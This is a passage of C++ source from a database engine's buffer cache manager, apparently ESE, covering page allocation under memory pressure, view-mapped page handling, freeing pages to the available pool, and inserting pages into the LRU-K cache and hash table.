Assert( 0 == CmpRbspos( pbfNew->rbsposSnapshot, rbsposMin ) );
Assert( 0 == CmpLgpos( &(pbfNew->lgposOldestBegin0), &lgposMax ) );
Assert( !pbfNew->fInOB0OL && pbfNew->ob0ic.FUninitialized() );
Assert( !pbfNew->bfbitfield.FImpedingCheckpoint() ); // tracking flags should be empty
Assert( !pbfNew->fSuspiciouslySlowRead );
}
#else
INLINE void BFIAssertNewlyAllocatedPage( const PBF pbfNew, const BOOL fAvailPoolAdd ) { return; }
#endif
ERR ErrBFIAllocPage( PBF* const ppbf, __in const ICBPage icbBufferSize, const BOOL fWait, const BOOL fMRU )
{
Assert( icbBufferSize > icbPageInvalid );
Assert( icbBufferSize < icbPageMax );
Assert( icbBufferSize <= g_icbCacheMax );
Assert( ppbf );
// try to allocate an available BF until we fail and we are not to wait
// or until we succeed
static_assert( dtickMaintAvailPoolOomRetry >= 16, "Can't be smaller than the default Windows timer resolution." );
ULONG cOutOfMemoryRetriesMax = roundupdiv( g_dtickMaintScavengeTimeout, dtickMaintAvailPoolOomRetry );
cOutOfMemoryRetriesMax = UlFunctionalMax( cOutOfMemoryRetriesMax, 10 );
ULONG cOutOfMemoryRetries = 0;
while ( fTrue )
{
*ppbf = pbfNil;
BFAvail::ERR errAvail;
ERR errAvailPoolRequest = JET_errSuccess;
if ( ( errAvail = g_bfavail.ErrRemove( ppbf, cmsecTest, fMRU ) ) != BFAvail::ERR::errSuccess )
{
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
do
{
BFICacheSizeBoost();
errAvail = g_bfavail.ErrRemove( ppbf, cmsecTest, fMRU );
if ( errAvail == BFAvail::ERR::errSuccess )
{
Assert( *ppbf != pbfNil );
break;
}
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
errAvailPoolRequest = ErrBFIMaintAvailPoolRequest( bfmaprtSync );
// failed trying to produce buffers, forcing it to consume deadlock settings might help
if ( ( errAvailPoolRequest != JET_errSuccess ) && fWait )
{
// compute optimal cache size
g_critCacheSizeSetTarget.Enter();
g_cacheram.UpdateStatistics();
g_cacheram.SetOptimalResourcePoolSize();
g_critCacheSizeSetTarget.Leave();
// perform the actual resizing
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
const ERR errCacheResize = ErrBFICacheGrow();
FOSSetCleanupState( fCleanUpStateSaved );
if ( ( errAvailPoolRequest == JET_errOutOfMemory ) ||
( ( errAvailPoolRequest > JET_errSuccess ) && ( errCacheResize == JET_errOutOfMemory ) ) )
{
cOutOfMemoryRetries++;
if ( FRFSAnyFailureDetected() )
{
cOutOfMemoryRetriesMax = 10;
}
if ( cOutOfMemoryRetries > cOutOfMemoryRetriesMax )
{
errAvailPoolRequest = ErrERRCheck( JET_errOutOfMemory );
}
else
{
UtilSleep( dtickMaintAvailPoolOomRetry );
}
}
else
{
cOutOfMemoryRetries = 0;
}
}
errAvail = g_bfavail.ErrRemove( ppbf, fWait ? dtickFastRetry : cmsecTest, fMRU );
} while ( ( errAvail != BFAvail::ERR::errSuccess ) && ( errAvailPoolRequest >= JET_errSuccess ) && fWait );
}
if ( *ppbf == pbfNil )
{
Assert( errAvail == BFAvail::ERR::errOutOfObjects );
if ( fWait )
{
Assert( errAvailPoolRequest < JET_errSuccess );
if ( !FRFSAnyFailureDetected() )
{
FireWall( "AvailPoolMaintStalled" );
}
return errAvailPoolRequest;
}
else
{
return ErrERRCheck( errBFINoBufferAvailable );
}
}
else
{
Assert( errAvail == BFAvail::ERR::errSuccess );
}
Assert( !(*ppbf)->fInOB0OL && (*ppbf)->ob0ic.FUninitialized() );
// past point of failure for this buffer
(*ppbf)->sxwl.ClaimOwnership( bfltWrite );
Assert( (*ppbf)->sxwl.FOwnWriteLatch() );
Enforce( (*ppbf)->fAvailable );
// asserted in above func, but we want to make extra sure
AssertTrack( !(*ppbf)->bfbitfield.FRangeLocked(), "BFAllocRangeAlreadyLocked" );
Enforce( (*ppbf)->err != errBFIPageFaultPending );
Enforce( (*ppbf)->err != wrnBFPageFlushPending );
Enforce( (*ppbf)->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( *ppbf ) == NULL );
Enforce( (*ppbf)->pbfTimeDepChainNext == NULL );
Enforce( (*ppbf)->pbfTimeDepChainPrev == NULL );
Assert( (*ppbf)->bfdf == bfdfClean );
Assert( (*ppbf)->fOlderVersion == fFalse );
Assert( (*ppbf)->fSuspiciouslySlowRead == fFalse );
if ( (*ppbf)->bfat == bfatNone )
{
Expected( BoolParam( JET_paramEnableViewCache ) );
Assert( (*ppbf)->pv == NULL );
}
else
{
Assert( (*ppbf)->bfat == bfatFracCommit );
Assert( (*ppbf)->pv != NULL );
// Why would this not hold? Because of our shrink to zero - then it is not allocated.
Expected( (*ppbf)->icbBuffer == icbPage0 || FOSMemoryPageAllocated( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] ) ); // just check the first page ...
}
// success: requested size already, break to proceed.
if ( (*ppbf)->icbBuffer == icbBufferSize )
{
break;
}
const ERR errSetBufferSize = ErrBFISetBufferSize( *ppbf, icbBufferSize, fFalse );
// success: grew to requested size, break to proceed.
if ( errSetBufferSize >= JET_errSuccess )
{
break;
}
// failed to grow, handle error.
Assert( errSetBufferSize == JET_errOutOfMemory );
Assert( icbBufferSize > (*ppbf)->icbBuffer );
// re-insert the buffer into the avail pool after de-hydrating it to zero to
// increase chances of success next time
Assert( (*ppbf)->sxwl.FOwnWriteLatch() );
if ( (*ppbf)->icbBuffer != icbPage0 )
{
CallS( ErrBFISetBufferSize( *ppbf, icbPage0, fFalse ) );
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( *ppbf, bfrsNotCommitted );
Assert( bfrsOld != bfrsNotCommitted );
}
(*ppbf)->sxwl.ReleaseOwnership( bfltWrite );
Assert( !(*ppbf)->fInOB0OL && (*ppbf)->ob0ic.FUninitialized() );
g_bfavail.Insert( *ppbf, !fMRU );
*ppbf = pbfNil;
// fail out if we've tried too many times
if ( FRFSAnyFailureDetected() )
{
cOutOfMemoryRetriesMax = 10;
}
if ( cOutOfMemoryRetries > cOutOfMemoryRetriesMax )
{
return errSetBufferSize;
}
cOutOfMemoryRetries++;
}
// If we can, increase cache size before scavenger can kick in - allow cache to grow
// faster and prevent needless I/O
if ( ( g_bfavail.Cobject() <= (ULONG_PTR)cbfAvailPoolLow ) &&
( FJetConfigMedMemory() || FJetConfigLowMemory() ) &&
g_cacheram.AvailablePhysicalMemory() >= OSMemoryQuotaTotal() / 10 )
{
BFICacheSizeBoost();
}
// request avail pool maintenance
CallS( ErrBFIMaintAvailPoolRequest( bfmaprtUnspecific ) );
// update DBA statistics
// we track our evictions on page reuse, so we need to cache the buffer size here before it
// gets wiped out
const ICBPage icbBufferEvicted = (ICBPage)(*ppbf)->icbBuffer;
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( *ppbf, bfrsResident );
if ( bfrsOld != bfrsResident )
{
// we will not try to do this if a buffer is smaller than a VM page or
// the page is not marked as not resident
BOOL fTryReclaim = ( (DWORD)g_rgcbPageSize[(*ppbf)->icbBuffer] >= OSMemoryPageCommitGranularity() &&
bfrsOld == bfrsNotResident );
// if we are going to try for a reclaim then reset the page before we
// touch it to avoid causing a hard page fault if the page data has
// been evicted by the OS
if ( fTryReclaim )
{
if ( (*ppbf)->bfat == bfatFracCommit )
{
// Note: This will not be able to be checked if we ever move to an inst specific
// param for ViewCache because we could be reclaiming the buffer from another inst
// at this point.
Expected( !BoolParam( JET_paramEnableViewCache ) );
Assert( FOSMemoryPageAllocated( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] ) );
OSMemoryPageReset( (*ppbf)->pv, g_rgcbPageSize[(*ppbf)->icbBuffer] );
}
}
// force the buffer into our working set by touching its pages
Assert( (*ppbf)->err != wrnBFPageFlushPending ); // should never in this state, but check just in case ...
const size_t cbChunk = min( (size_t)g_rgcbPageSize[(*ppbf)->icbBuffer], OSMemoryPageCommitGranularity() );
for ( size_t ib = 0; ib < (size_t)g_rgcbPageSize[(*ppbf)->icbBuffer] && !BoolParam( JET_paramEnableViewCache ); ib += cbChunk )
{
if ( AtomicExchangeAdd( &((LONG*)((BYTE*)(*ppbf)->pv + ib))[0], 0 ) ||
AtomicExchangeAdd( &((LONG*)((BYTE*)(*ppbf)->pv + ib + cbChunk))[-1], 0 ) )
{
if ( bfrsOld == bfrsNotResident )
{
AtomicIncrement( (LONG*)&g_cpgReclaim );
}
}
}
}
Assert( (*ppbf)->icbBuffer != icbPageInvalid );
if ( (*ppbf)->fNewlyEvicted )
{
(*ppbf)->fNewlyEvicted = fFalse;
AtomicIncrement( (LONG*)&g_cbfNewlyEvictedUsed );
AtomicExchangeAdd( (LONG*)&g_cbNewlyEvictedUsed, g_rgcbPageSize[icbBufferEvicted] );
}
(*ppbf)->fAvailable = fFalse;
// validate things that must be true of freshly allocated buffers ...
BFIAssertNewlyAllocatedPage( *ppbf );
return JET_errSuccess;
}
BOOL FBFICacheViewCacheDerefIo( const BF * const pbf )
{
Assert( pbf->bfat != bfatNone );
// When JET_paramEnableViewCache is on, this allows ESE to allocate buffers in one of two
// ways:
// 1. The normal read path (bfatViewMapped)
// 2. And sometimes the past EOF / new page path (bfatPageAlloc)
// this sort of creates a ambiguity, in that we have two alloc modes that are part of
// the "ViewCache IO" method ... so while bfatPageAlloc is actually more similar to the
// classic-BF caching/commit model of bfatFracCommit, it is in many places treated as
// ViewCache (at least for IO).
// It also creates sort of a confusing state, in that the the alloc type is covering and
// imputing the IO model, but mostly that is because how we get the pv (what bfat covers)
// is allocated / set is implicitly tied to the the alloc type - so the two are kind of
// tied together.
// But the up shot is that for IO - bfatViewMapped and bfatPageAlloc are both considered
// part of ViewCache ...
return ( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc );
}
ERR ErrBFICacheIMapPage( BF * const pbf, const BOOL fNewPage )
{
ERR err = JET_errSuccess;
Assert( pbf );
Assert( pbf->ifmp != 0 );
Assert( pbf->ifmp != ifmpNil );
Assert( pbf->pgno != pgnoNull );
Assert( pbf->icbBuffer != icbPageInvalid && pbf->icbBuffer != icbPage0 );
Assert( pbf->sxwl.FOwnWriteLatch() );
Expected( BoolParam( JET_paramEnableViewCache ) );
const size_t cb = g_rgcbPageSize[pbf->icbBuffer];
if ( !fNewPage )
{
// if this is not a new page operation then map a view of the page
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
err = pfapi->ErrMMCopy( OffsetOfPgno( pbf->pgno ), cb, &pbf->pv );
AssertTrack( err != JET_errFileIOBeyondEOF, "BFICacheMapPageEof" );
FOSSetCleanupState( fCleanUpStateSaved );
if ( err == JET_errFileIOBeyondEOF )
{
// I _think_ that we can auto-extend the file in this way during recovery. In this code
// path, we fall through and call PvOSMemoryPageAlloc() to allocate a new page.
err = JET_errSuccess;
}
else
{
Assert( err <= JET_errSuccess ); // Not sure what warnings would mean, and if it should be considered mapped?
Assert( pbf->bfat == bfatNone );
if ( err == JET_errSuccess )
{
// ErrMMCopy() succeded, update state ...
Assert( pbf->pv );
Assert( FOSMemoryFileMapped( pbf->pv, cb ) );
Assert( !FOSMemoryFileMappedCowed( pbf->pv, cb ) ); // at least initially it shouldn't have made a copy
Assert( !FOSMemoryPageAllocated( pbf->pv, cb ) );
pbf->bfat = bfatViewMapped;
}
}
if ( err )
{
AssertRTL( JET_errOutOfMemory == err ); // really an ExpectedRTL()
Assert( pbf->pv == NULL );
// Any error we must bail ...
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
else // !fUseHistory
{
pbf->pv = NULL;
}
// if we didn't map a view then alloc a page of memory
if ( pbf->pv == NULL )
{
Assert( pbf->bfat != bfatViewMapped ); // We'll leak a mapping
Assert( pbf->bfat == bfatNone ); // Or maybe leak fractional commit?
if ( !( pbf->pv = PvOSMemoryPageAlloc( cb, NULL ) ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
Assert( FOSMemoryPageAllocated( pbf->pv, cb ) );
Assert( !FOSMemoryFileMapped( pbf->pv, cb ) );
pbf->bfat = bfatPageAlloc;
}
HandleError:
if ( err < JET_errSuccess )
{
Assert( pbf->bfat == bfatNone );
Assert( pbf->pv == NULL );
}
else
{
Assert( pbf->bfat != bfatNone );
Assert( pbf->pv != NULL );
}
return err;
}
void BFICacheIUnmapPage( BF * const pbf )
{
Assert( pbf );
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
Assert( pbf->ifmp != 0 );
Assert( pbf->ifmp != ifmpNil );
Assert( pbf->pgno != pgnoNull );
Expected( BoolParam( JET_paramEnableViewCache ) );
Assert( pbf->bfat != bfatNone );
Assert( pbf->bfat != bfatFracCommit );
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc ); // just in case anyone changes the set of these...
Assert( pbf->icbPage == pbf->icbBuffer );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
if ( pbf->bfat == bfatViewMapped )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
Assert( !FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
if ( pfapi->ErrMMFree( pbf->pv ) >= JET_errSuccess )
{
pbf->pv = NULL;
pbf->bfat = bfatNone;
}
else
{
// I suspect a lot will go wrong at this point ...
AssertSz( fFalse, "This shouldn't fail (anymore), as we know when to call OSMemoryPageFree() vs. unmap a view." );
}
}
else
{
Assert( pbf->bfat == bfatPageAlloc );
Assert( FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
Assert( !FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] ) );
OSMemoryPageFree( pbf->pv );
pbf->pv = NULL;
pbf->bfat = bfatNone;
}
}
}
void BFIFreePage( PBF pbf, const BOOL fMRU, const BFFreePageFlags bffpfDangerousOptions )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// assert page has no lingering dirty-type state (would imply evicting something we shouldn't)
Assert( pbf->bfdf == bfdfClean );
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
AssertTrack( !pbf->bfbitfield.FRangeLocked(), "BFFreeRangeStillLocked" );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
Assert( !pbf->fOlderVersion );
// assert page in viewcache mode hasn't leaked anything
Assert( FBFIValidPvAllocType( pbf ) );
Assert( pbf->bfat == bfatFracCommit || ( UlParam( JET_paramEnableViewCache ) && pbf->bfat == bfatNone ) );
Assert( icbPageInvalid != pbf->icbBuffer );
// officially remove this IFMP / PGNO from this BF
if ( pbf->ifmp != ifmpNil && // BF is holding a valid database page
PinstFromIfmp( pbf->ifmp ) ) // BF is holding a database page for an active instance
// (not retaining a page for a non-attached database)
{
PERFOpt( cBFCache.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce, pbf->ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
Assert( icbPageInvalid != pbf->icbPage );
}
// we should only update the histogram if we are not freeing the page for the first time.
if ( icbPageInvalid != pbf->icbPage )
{
AtomicDecrement( &g_rgcbfCachePages[pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pbf->icbBuffer] >= 0 );
}
pbf->ifmp = ifmpNil;
pbf->pgno = pgnoNull;
pbf->tce = tceNone;
pbf->fAbandoned = fFalse;
pbf->bfbitfield.SetFRangeLocked( fFalse );
pbf->fSyncRead = fFalse;
// reset the page / buffer size
pbf->icbPage = icbPageInvalid;
// we do not reset the buffer size yet, the next time the buffer is allocated it will be set
// to an appropriate size.
// quiesce the buffer if the caller told us to, instead of adding it to the avail pool.
if ( bffpfDangerousOptions & bffpfQuiesce )
{
BFIReleaseBuffer( pbf );
}
// we can free this BF
else
{
// about to put in avail pool
pbf->sxwl.ReleaseOwnership( bfltWrite );
BFIAssertNewlyAllocatedPage( pbf, fTrue );
#ifdef DEBUG
// the assertions below are only valid if we're not running in view-cache mode and we're not
// adding the buffer to the avail pool for the first time, right out of the initial cache
// allocation
if ( !UlParam( JET_paramEnableViewCache ) &&
!( ( pbf->icbBuffer == g_icbCacheMax ) && ( IbfBFICachePbf( pbf ) >= cbfCacheAddressable ) ) )
{
Assert( !pbf->fQuiesced || ( pbf->icbBuffer == icbPage0 ) ); // All quiesced buffers must be fully dehydrated.
Expected( ( pbf->icbBuffer != icbPage0 ) || pbf->fQuiesced ); // Fully dehydrated buffers are expected to be quiesced.
}
#endif // DEBUG
if ( pbf->fQuiesced )
{
Assert( g_critCacheSizeResize.FOwner() );
if ( IbfBFICachePbf( pbf ) < cbfCacheAddressable )
{
// we're unquiescing a previously allocated-then-quiesced buffer, instead
// of a buffer being added to the avail pool for the first time as part
// of cache growth
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfquiesced.Remove( pbf );
}
AtomicIncrement( (LONG*)&g_cbfCacheClean );
cbfCacheSize++; // atomic not required
Assert( cbfCacheSize > 0 );
}
// mark this BF as available
pbf->fQuiesced = fFalse;
pbf->fAvailable = fTrue;
// free the available BF
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
g_bfavail.Insert( pbf, fMRU );
}
}
ERR ErrBFICachePage( PBF* const ppbf,
const IFMP ifmp,
const PGNO pgno,
const BOOL fNewPage,
const BOOL fWait,
const BOOL fMRU,
const ULONG_PTR pctCachePriority,
const TraceContext& tc,
const BFLatchType bfltTraceOnly,
const BFLatchFlags bflfTraceOnly )
{
ERR err;
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BFLRUK::ERR errLRUK;
const TCE tce = (TCE)tc.nParentObjectClass;
Assert( pgno >= 1 );
// use pre-allocated BF if provided (we own freeing it in case of error)
pgnopbf.pbf = *ppbf;
FMP* pfmp = &g_rgfmp[ ifmp ];
// reject caching pages beyond the physical size of the database
if ( !fNewPage )
{
PGNO pgnoLast = pgnoNull;
err = pfmp->ErrPgnoLastFileSystem( &pgnoLast );
// FMP::ErrPgnoLastFileSystem() returns JET_errDatabaseCorrupted if the database
// file is smaller than cpgDBReserved. Treat that as EOF as we are obviously
// trying to cache a non-header page.
if ( ( ( err >= JET_errSuccess ) && ( pgno > pgnoLast ) ) ||
( err == JET_errDatabaseCorrupted ) )
{
Error( ErrERRCheck( JET_errFileIOBeyondEOF ) );
}
Call( err );
}
// allocate our BF FMP context, if not allocated
if ( !pfmp->FBFContext() )
{
Call( ErrBFISetupBFFMPContext( ifmp ) );
}
// calculated the needed buffer
const INT icbPageSize = IcbBFIPageSize( pfmp->CbPage() );
Assert( icbPageSize == IcbBFIBufferSize( pfmp->CbPage() ) );
// allocate a new BF to contain this IFMP / PGNO, assuming the buffer size will need to
// be as large as the page size, and waiting forever if necessary and requested
if ( pgnopbf.pbf == NULL )
{
const ERR errBufferAlloc = ErrBFIAllocPage( &pgnopbf.pbf, IcbBFIBufferSize( pfmp->CbPage() ), fWait, fMRU );
if ( errBufferAlloc < JET_errSuccess )
{
Expected( ( errBufferAlloc == JET_errOutOfMemory ) || ( errBufferAlloc == JET_errOutOfBuffers ) );
// report a hard error if we are failing to allocate buffers
//
// NOTE: ideally, this call would be inside of scavenge pages or in
// ErrBFIAllocPage but those functions exist outside the scope of any
// instance. that makes it tricky to raise the error. we will thus
// trap it here where we can get most (but not all) of the victims
//
OSUHAEmitFailureTag( PinstFromIfmp( ifmp ), HaDbFailureTagHard, L"9ee69aa5-53f9-43e6-9b6c-b817db21b9c2" );
}
Call( errBufferAlloc );
}
Assert( pgnopbf.pbf->sxwl.FOwnWriteLatch() );
BFIAssertNewlyAllocatedPage( pgnopbf.pbf );
Assert( pgnopbf.pbf->icbBuffer == IcbBFIBufferSize( pfmp->CbPage() ));
// set this BF to contain this IFMP / PGNO
Assert( ifmpNil != ifmp );
pgnopbf.pbf->ifmp = ifmp;
pgnopbf.pbf->pgno = pgno;
pgnopbf.pbf->icbPage = icbPageSize;
pgnopbf.pbf->tce = tce;
AssertTrack( !pgnopbf.pbf->bfbitfield.FRangeLocked(), "BFCacheRangeAlreadyLocked" );
pgnopbf.pbf->bfbitfield.SetFRangeLocked( fFalse );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), tce, ifmp ) );
Assert( icbPageInvalid != pgnopbf.pbf->icbBuffer );
AtomicIncrement( &g_rgcbfCachePages[pgnopbf.pbf->icbBuffer] );
Assert( g_rgcbfCachePages[pgnopbf.pbf->icbBuffer] > 0 );
pgnopbf.pgno = pgno;
// if we are mapping views then create a view of this page
if ( BoolParam( JET_paramEnableViewCache ) )
{
Call( ErrBFICacheIMapPage( pgnopbf.pbf, fNewPage ) );
}
else
{
Assert( FOSMemoryPageAllocated( pgnopbf.pbf->pv, g_rgcbPageSize[pgnopbf.pbf->icbBuffer] ) );
Assert( !FOSMemoryFileMapped( pgnopbf.pbf->pv, g_rgcbPageSize[pgnopbf.pbf->icbBuffer] ) );
Assert( pgnopbf.pbf->bfat == bfatFracCommit );
pgnopbf.pbf->bfat = bfatFracCommit; // just in case, but remove this if it holds awhile ...
}
Assert( FBFIValidPvAllocType( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->bfat != bfatNone );
// insert this IFMP / PGNO in the LRUK
BOOL fRepeatedlyRead = fFalse;
const TICK tickCache = TickOSTimeCurrent();
errLRUK = g_bflruk.ErrCacheResource( IFMPPGNO( ifmp, pgno ),
pgnopbf.pbf,
tickCache,
pctCachePriority,
!fNewPage, // fUseHistory
&fRepeatedlyRead );
// we failed to insert this IFMP / PGNO in the LRUK
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errOutOfMemory );
// bail with out of memory
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
// insert this IFMP / PGNO in the hash table
g_bfhash.WriteLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrInsertEntry( &lock, pgnopbf );
g_bfhash.WriteUnlockKey( &lock );
// the insert failed
if ( errHash != BFHash::ERR::errSuccess )
{
// release our allocated BF
//
// HACK: if we can't evict the resource, wait until we can. no one
// else will be able to evict it because we have the write latch so we
// can't get stuck here forever. besides, this case is extremely rare
TICK cmsecTotal = 0;
while ( g_bflruk.ErrEvictResource( IFMPPGNO( pgnopbf.pbf->ifmp, pgnopbf.pbf->pgno ),
pgnopbf.pbf,
fFalse ) != BFLRUK::ERR::errSuccess )
{
UtilSleep( dtickFastRetry );
cmsecTotal += dtickFastRetry;
if ( cmsecTotal > (TICK)cmsecDeadlock )
{
AssertSz( fFalse, "BF LRU-K eviction appears to be hung." );
cmsecTotal = 0;
}
}
// the insert failed because the IFMP / PGNO is already cached
if ( errHash == BFHash::ERR::errKeyDuplicate )
{
// fail with page already cached
Error( ErrERRCheck( errBFPageCached ) );
}
// the insert failed because we are out of memory
else
{
Assert( errHash == BFHash::ERR::errOutOfMemory );
// fail with out of memory
Error( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// mark this BF as the current version of this IFMP / PGNO
pgnopbf.pbf->fCurrentVersion = fTrue;
// return success
*ppbf = pgnopbf.pbf;
Enforce( FBFICurrentPage( *ppbf, ifmp, pgno ) );
Enforce( pgnopbf.pbf->pbfTimeDepChainNext == NULL );
Enforce( pgnopbf.pbf->pbfTimeDepChainPrev == NULL );
Enforce( wrnBFPageFlushPending != pgnopbf.pbf->err );
Enforce( JET_errSuccess == pgnopbf.pbf->err );
Enforce( NULL == pgnopbf.pbf->pWriteSignalComplete );
Enforce( NULL == PvBFIAcquireIOContext( pgnopbf.pbf ) );
Assert( FBFIValidPvAllocType( pgnopbf.pbf ) );
Assert( pgnopbf.pbf->bfat != bfatNone );
if ( fRepeatedlyRead )
{
PERFOpt( cBFPagesRepeatedlyRead.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce ) );
}
const BOOL fDBScan = ( bflfTraceOnly & bflfDBScan );
// caching a page is always considered unique because it starts a new lifetime for the page in the cache
// also, do not count a DBM fault as a request to avoid polluting the perf counter
if ( !fNewPage && !fDBScan )
{
PERFOpt( cBFCacheUniqueReq.Inc( PinstFromIfmp( pgnopbf.pbf->ifmp ), pgnopbf.pbf->tce, pgnopbf.pbf->ifmp ) );
Ptls()->threadstats.cPageUniqueCacheRequests++;
}
// trace that we changed the state of this page
const BFRequestTraceFlags bfrtfTraceOnly = BFRequestTraceFlags(
( fNewPage ? bfrtfNewPage : bfrtfUseHistory ) |
( BoolParam( JET_paramEnableFileCache ) ? bfrtfFileCacheEnabled : bfrtfNone ) |
( fDBScan ? bfrtfDBScan : bfrtfNone ) );
BFITraceCachePage( tickCache, pgnopbf.pbf, bfltTraceOnly, (ULONG)pctCachePriority, bflfTraceOnly, bfrtfTraceOnly, tc );
OSTraceFMP( pgnopbf.pbf->ifmp, JET_tracetagBufferManagerBufferCacheState,
OSFormat( "Cached page=[0x%x:0x%x], pbf=%p, pv=%p tce=%d",
(ULONG)pgnopbf.pbf->ifmp,
pgnopbf.pbf->pgno,
pgnopbf.pbf,
pgnopbf.pbf->pv,
pgnopbf.pbf->tce ) );
return JET_errSuccess;
HandleError:
AssertRTL( err > -65536 && err < 65536 );
Assert( err < JET_errSuccess );
if ( pgnopbf.pbf != NULL )
{
// release our mapped or allocated BF
BFICacheIUnmapPage( pgnopbf.pbf );
Assert( pgnopbf.pbf->bfat == bfatNone || !UlParam( JET_paramEnableViewCache ) );
// free our buffer
BFIFreePage( pgnopbf.pbf, fMRU );
}
*ppbf = pbfNil;
return err;
}
// Determine if this page needs to be refreshed
INLINE BOOL FBFICacheViewFresh( const PBF pbf )
{
Assert( pbf->bfat == bfatViewMapped );
return DtickDelta( pbf->tickViewLastRefreshed, TickOSTimeCurrent() ) < dtickMaintRefreshViewMappedThreshold;
}
// Refresh the page by guardedly reading every OS MM page in an exception handler (handled
// by ErrMMIORead()), and update the last refreshed time.
ERR ErrBFICacheViewFreshen( PBF pbf, const OSFILEQOS qosIoPriorities, const TraceContext& tcBase )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwner() );
Assert( pbf->bfat == bfatViewMapped );
Assert( pbf->bfls != bflsHashed ); // this means
Assert( g_rgcbPageSize[g_icbCacheMax] == CbBFIPageSize( pbf ) );
TraceContextScope tcReclaimFromOS;
tcReclaimFromOS->iorReason.AddFlag( iorfReclaimPageFromOS );
HRT hrtStart = HrtHRTCount();
Call( g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ),
(BYTE*)pbf->pv,
CbBFIPageSize( pbf ),
IFileAPI::FileMmIoReadFlag( IFileAPI::fmmiorfKeepCleanMapped | IFileAPI::fmmiorfPessimisticReRead ) ) );
// We don't know for sure if this was an IO or not, but we're going to assume if it was over 100 mics, that
// it was in fact an IO. < 100 mics, probably just in the OS FS cache / view mapped. Note it would take
// an IO device cable of 10k IOPS to stop tracking this latency.
const QWORD usecs = ( 1000000 * ( HrtHRTCount() - hrtStart ) ) / HrtHRTFreq();
if ( usecs > 100 )
{
BFITrackCacheMissLatency( pbf, hrtStart, bftcmrReasonMapViewRefresh, qosIoPriorities, *tcReclaimFromOS, err );
}
// hmmm, should we update?
//Ptls()->threadstats.cPageRead++;
pbf->tickViewLastRefreshed = TickBFIHashedLatchTime( TickOSTimeCurrent() );
HandleError:
return err;
}
// We have decided the page is ripe for flushing for some reason, do so ...
//
void BFIOpportunisticallyFlushPage( PBF pbf, IOREASONPRIMARY iorp )
{
CBFIssueList bfil;
// Since this is an opportunistic attempt, and will not fail the main operation we do not need cleanup path checking here.
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
// We used to pass qosIODispatchUrgentBackground here because we wanted to give the largest
// chance that the IO request was accepted - not that we wanted to build an IO queue actually
// that deep to move along checkpoint (or filthy flush). In prod analysis on namprd10dg140 we
// found 2.4% of IOs were coming down with the "max qos" value - that matches qosIODispatchUrgentBackground
// & iorpBFCheckpointAdv & iorfForeground, and so this is the source of it. Now we have the
// Meted Q - where it will always be accepted, but not pushed out urgently ... this is a better
// option at this point.
// Shouldn't this call to ErrBFIFlushPage be passing in fOpportune = fTrue?
const ERR errT = ErrBFIFlushPage( pbf,
IOR( iorp, iorfForeground ),
qosIODispatchWriteMeted | qosIODispatchImmediate,
( iorp == iorpBFFilthyFlush ) ? bfdfFilthy : bfdfDirty );
// Restore cleanup checking
FOSSetCleanupState( fCleanUpStateSaved );
if ( errT == errDiskTilt )
{
// This will occur if you do 32768 concurrent IOs due to the rangelock meted section going
// into overflow ... but ESE should not have let that happen ever - with the exception of
// this fault injection we added to make sure this path works. But we generally do not want
// our meted IOs to be rejected.
#ifdef DEBUG
AssertSz( ChitsFaultInj( 39452 ) > 0, "DiskTiltOnMetedWriteIoReqWithoutFi" );
#else
AssertTrack( fFalse, "DiskTiltOnMetedWriteIoReq" );
#endif
// unfortunately due to the bf issue list getting updated before the IO is actually
// accepted by the IO manager, we can get into a situation where errDiskTilt will give
// us an entry, but we've nothing to do. Nullify / rollback this situation.
bfil.NullifyDiskTiltFake( pbf->ifmp );
Assert( bfil.FEmpty() );
}
if ( errT == errBFIPageFlushed )
{
// Issue the enqueued page I/O here.
CallS( bfil.ErrIssue() );
}
else if ( errT == errBFIRemainingDependencies )
{
// No enqueued/pending page to be flushed, just abandon the logOps.
